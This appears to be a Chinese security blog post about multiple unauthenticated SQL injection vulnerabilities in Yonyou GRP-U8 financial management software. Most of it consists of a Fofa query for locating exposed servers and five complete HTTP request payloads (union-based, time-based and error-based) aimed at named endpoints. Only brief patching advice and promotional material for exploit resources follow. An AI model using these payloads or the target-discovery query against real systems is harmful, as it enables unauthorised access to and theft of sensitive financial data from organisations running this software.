用友 GRP-U8 多种 SQL 注入漏洞
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
漏洞详情:
用友 GRP-U8 是一款功能强大的财务管理软件,可以帮助企业快速、准确地进行财务核算和资金管理。用友 GRP-U8 存在多个SQL注入漏洞。
原理分析:
用友 GRP-U8 存在多个SQL注入漏洞,未经身份验证的远程攻击者通过该接口发送恶意数据包执行 SQL 注入,导致敏感信息泄露或命令执行。
影响范围:
用友 GRP-U8
资产测绘
Fofa:(body="GRP-U8" && body="./scripts/cookie.js") || title="GRP-U8"
漏洞利用
0X01:用友 GRP-U8 sqcxIndex SQL 注入
poc
POST /u8qx/sqcxIndex.jsp HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
11=11&key=2%25')+union+select+@@version,111*111--+
0X02:用友 GRP-U8 license_check SQL 注入
poc
GET /u8qx/license_check.jsp?kjnd=1';WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
0X03:用友 GRP-U8 forgetPassword_old SQL注入
poc
POST /u8qx/forgetPassword_old.jsp?action=save HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 366
idCard=1%27%20AND%207155%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BC
HAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20SUBSTRING%28%28ISNULL
%28CAST%28112%2A111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024
%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%281
13%29%29%29--%20BEmg&inputDW=1&userName=1
0X04:用友 GRP-U8 dialog_moreUser_check SQL注入
poc
GET /u8qx/dialog_moreUser_check.jsp?mlid=1';WAITFOR+DELAY+'0:0:3'-- HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
0X05:用友 GRP-U8 bx_dj_check SQL 注入
poc
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';WAITFOR%20DELAY%20'0:0:3'--
HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
漏洞修复建议
1、升级系统到最新版本
2、官网搜索补丁
https://security.yonyou.com/#/patchList
关于我们:
感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。
关注福利:
回复“google工具" 获取 google语法生成工具
回复“burp插件" 获取 bp常用插件打包。
回复“暴力破解字典" 获取 各种常用密码字典打包
回复“XSS利用文件" 获取 现成XSS利用文件.pdf
回复“蓝队工具箱”即可获取一款专业级应急响应的集成多种工具的工具集
知识星球
星球里有什么?
web思路及SRC赏金,攻防演练资源分享(免杀,溯源,钓鱼等),各种新鲜好用工具,poc定期更新
提前续费有优惠,好用不贵很实惠
交流群
关注公众号回复“加群”,QQ群可直接扫码添加
安全考证
需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜,CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP......
往期推荐
球分享
球点赞
球在看
原文始发于微信公众号(不秃头的安全):漏洞情报-用友 GRP-U8 多种 SQL 注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论